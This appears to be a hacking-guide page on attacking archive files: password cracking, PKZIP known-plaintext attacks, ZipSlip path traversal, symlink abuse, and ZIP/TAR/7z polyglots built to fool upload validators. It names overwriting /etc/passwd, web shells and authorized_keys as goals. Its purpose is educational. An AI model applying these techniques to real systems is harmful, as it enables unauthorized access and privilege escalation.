Archives
Different kinds of file archives, like ZIP, RAR or TAR
Last updated
Different kinds of file archives, like ZIP, RAR or TAR
Last updated
Sometimes a zip file can be corrupted, either intentionally or unintentionally. You can try to fix it using the -FF
flag in zip
:
Sometimes binwalk
can also help with finding files in the ZIP when unzip
cannot.
When you suspect some kind of file trickery you should look at the file format, and find things that are weird about this ZIP file. Password Protection
Most types of archive files can set a password that encrypts the content until the correct password is given. There are a few tricks to brute-force or even bypass this password protection.
I spent a lot of time automating the cracking of password-protected archives in my default tool:
It will automatically recognize the type of encryption used and start hashcat or john to crack it using a wordlist.
Doing it manually would require you to first get a hash using a tool like zip2john
included in John the Ripper. Then you crack that hash with hashcat or john if you have the right hash mode.
An interesting little thing about most archive file formats is the fact that when they are encrypted, you can still read the filenames and structure, only the content is encrypted. This can already give a good idea of what kind of files the archive contains.
As you can see, even the size and a CRC32 are present. This CRC is a checksum of the unencrypted file content, so if you can guess the content you can confirm it by taking the CRC. This allows for brute-forcing content of very small files as well. See this tool for an implementation of that:
The PKZIP stream cipher is vulnerable to a Known Plaintext attack. This means that if we know some content of a file in the encrypted ZIP, we can use it to find the keys used to decrypt the rest.
With a faster brute-force attack afterward it is also possible to recover the original password for further use.
The bkcrack tool has a great implementation of this attack, see the tutorial here on how to use it:
When creating your own archives that some target processes, you can include malicious filenames like ../../../../etc/passwd
to overwrite/create local files in outside directories. This functionality can exist if an application has an import functionality or automatically extracts archives you upload.
While the most common format is ZIP, this vulnerability exists in many more archive types. Like .tar
, .jar
, .war
, .cpio
, .apk
, .rar
or .7z
Filenames in zip files can be folders because a ZIP file may contain folders, but the unexpected functionality is that they may even be ../
filenames, there is no limit. Most popular archive extract functions (from libraries) are safe from this by explicitly normalizing or forbidding these paths, but custom implementations could very well be vulnerable:
The main pattern to look out for is:
Looping through the elements
Concatenating the target directory with the filename directly
To test for and exploit such a vulnerability, simply create a file entry with a custom name:
Aside from directory traversal in filenames like shown above, most formats can even include symbolic links that point to another path. When extracted, most libraries or commands will correctly recognize and create symlinks while extracting, but these special files can have weird side effects.
Processes afterward might read/write to this file but accidentally follow the symlink we created while doing so. This can result in arbitrary file read/write with multiple steps.
Tip: You can even include multiple file entries with the same name, allowing for even more complex attacks. See here for an example that writes a symlink, and then overwrites its contents from within the same TAR file
When using zip
to include a symlink you made, it will by default follow the symlink and include the content of the file it is pointing to. This may be useful for Linux Privilege Escalation when an application zips a symlink you make locally, but in a scenario where it only extracts the file, you should keep the symlink intact inside the ZIP file using the --symlinks
option:
By default, the tar
command will allow storing and extracting symlinks:
A "polyglot" is defined in English as a person who speaks multiple languages. When talking about file formats, this means a file that can be interpreted in multiple ways. These are useful for various reasons, mainly confusing parsers. A check might use one parser, but when using the file it will be parsed differently bypassing the check.
Archive files have a few interesting properties of flexibility that make it fairly straightforward to create one file that extracts in two different ways depending on the tool used to inspect/extract it.
To understand why tricks work and to come up with your own, look at the @corkami/pics repository which has simple but useful images for many file formats, including archives.
When some code tries to validate a ZIP file before extracting it, there is a high chance you can confuse it somehow to have the check parse it differently than the extraction. One such example is using ZIP files combined with 7z. This is possible because a ZIP file is parsed from the end, while a .7z file is parsed from the start recognized by its magic bytes!
A useful tool that can help us with this is truepolyglot
which has a zipany
mode that can prefix a ZIP file with any content, and fix the offsets so it unzips without any errors. When we prefix a regular ZIP file with a 7z file, it will result in a special polyglot file that is a valid ZIP with some content, but 7z x
extracts it with the .7z's content. This confusion may bypass some checks.
This created a polyglot.zip
file which has the properties described above, confusing ZIP parsers thinking it is an innocent file, but has different contents when extracting using 7z x
:
In the previous trick, we learned that ZIP gets parsed from the end of the file. This can bypass most parsers and doesn't require the first bytes to be the magic bytes in the file. In specific cases, however, this might not be enough, and you do need control over the start of the file to set the ZIP magic bytes for example. Then the trick above wouldn't work because the .7z format has its own.
To solve this, TAR can be used which does not require magic bytes at the start of the file like ZIP. When you try to create a raw .tar
file using tar -cf
, you may notice that it immediately starts with the filename you added:
This can be abused to overwrite this filename with the ZIP magic bytes, which will happily be parsed as a filename. By overwriting these bytes, we bypass the magic bytes at the start of the file, and during extraction, the rest of the files in the TAR will be extracted.
The shell.tar
file will have the correct magic bytes already, which are kept after the truepolyglot
in the final polyglot.zip
file. This will have ZIP magic bytes, be a valid parsable ZIP file, and at the same time be recognized as TAR by 7z
. See the following demo:
The above example will create a ZIP file payload.zip
, that when extracted by vulnerable, will try to overwrite /etc/passwd
with the content you choose. This can be useful if root
executes it for a Privilege Escalation scenario, but more commonly you'll want to get initial access by overwriting executable files like PHP shells, templates, dotfiles, or ~/.ssh/authorized_keys
if SSH is enabled (see for more details).